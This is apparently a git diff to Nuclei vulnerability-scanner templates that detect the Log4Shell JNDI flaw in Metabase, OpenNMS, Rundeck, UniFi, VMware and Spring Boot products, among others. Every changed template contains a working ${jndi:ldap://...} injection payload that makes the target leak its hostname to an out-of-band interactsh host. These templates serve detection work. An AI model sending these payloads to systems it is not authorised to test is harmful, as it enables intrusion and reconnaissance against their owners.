{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} matchers-condition: and matchers: @@ -44,7 +48,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -56,10 +60,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/23 diff --git a/http/vulnerabilities/other/metabase-log4j.yaml b/http/vulnerabilities/other/metabase-log4j.yaml index e41ef8f305..36791dbde1 100644 --- a/http/vulnerabilities/other/metabase-log4j.yaml +++ b/http/vulnerabilities/other/metabase-log4j.yaml @@ -20,10 +20,14 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - method: GET path: - - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}" + - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}" matchers-condition: and matchers: @@ -35,7 +39,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -47,8 +51,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index c4dc6b88e6..b3652f3f84 100644 --- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -29,7 +33,7 @@ http: Referer: {{RootURL}}/opennms/login.jsp Content-Type: application/x-www-form-urlencoded - j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= matchers-condition: and matchers: @@ -41,17 +45,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by cs on 2022/10/23 diff --git a/http/vulnerabilities/other/rundeck-log4j.yaml b/http/vulnerabilities/other/rundeck-log4j.yaml index ac18f2b942..e75aff0a70 100644 --- a/http/vulnerabilities/other/rundeck-log4j.yaml +++ b/http/vulnerabilities/other/rundeck-log4j.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -30,7 +34,7 @@ http: Connection: close Referer: {{BaseURL}}/user/login - j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin matchers-condition: and matchers: @@ -42,7 +46,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: location @@ -54,8 +58,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index 34eb8d1bf4..a69ef0488f 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -31,7 +35,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage - {"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true} + {"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true} matchers-condition: and matchers: @@ -43,13 +47,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/06/03 diff --git a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml index aca4005456..05b40f2f35 100644 --- a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml +++ b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml @@ -21,10 +21,14 @@ info: verified: "true" tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - method: GET path: - - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D' + - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D' matchers-condition: and matchers: @@ -36,7 +40,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -48,8 +52,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/xenmobile-server-log4j.yaml b/http/vulnerabilities/other/xenmobile-server-log4j.yaml index 2158b0c435..2348d55b03 100644 --- a/http/vulnerabilities/other/xenmobile-server-log4j.yaml +++ b/http/vulnerabilities/other/xenmobile-server-log4j.yaml @@ -11,6 +11,10 @@ info: shodan-query: title:"XenMobile" tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -23,7 +27,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp - login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin + login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin matchers-condition: and matchers: @@ -35,7 +39,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -47,8 +51,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml index c4db37d567..07b274d7c6 100644 --- a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -20,12 +20,16 @@ info: metadata: max-request: 1 +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}} + X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}} matchers-condition: and matchers: @@ -37,17 +41,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/31 diff --git a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml index 3877eb0b4f..20857cd01f 100644 --- a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -32,7 +36,7 @@ http: { "authType": "password", - "username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}", + "username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}", "password": "admin" } @@ -46,16 +50,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2022/10/05 diff --git a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml index a2184675c3..fdc815da88 100644 --- a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -30,7 +34,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/login.jsp - username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit= matchers-condition: and matchers: @@ -42,7 +46,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: location @@ -54,8 +58,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml index e51d71778d..8980a6643e 100644 --- a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -33,7 +37,7 @@ http: Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin - mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us + mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us matchers-condition: and matchers: @@ -45,7 +49,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -57,8 +61,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml index 428d995cb1..d37d281e1c 100644 --- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml +++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml @@ -23,6 +23,10 @@ info: verified: "true" tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -32,7 +36,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/ui/ - {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"} + {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"} matchers-condition: and matchers: @@ -44,13 +48,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/04/05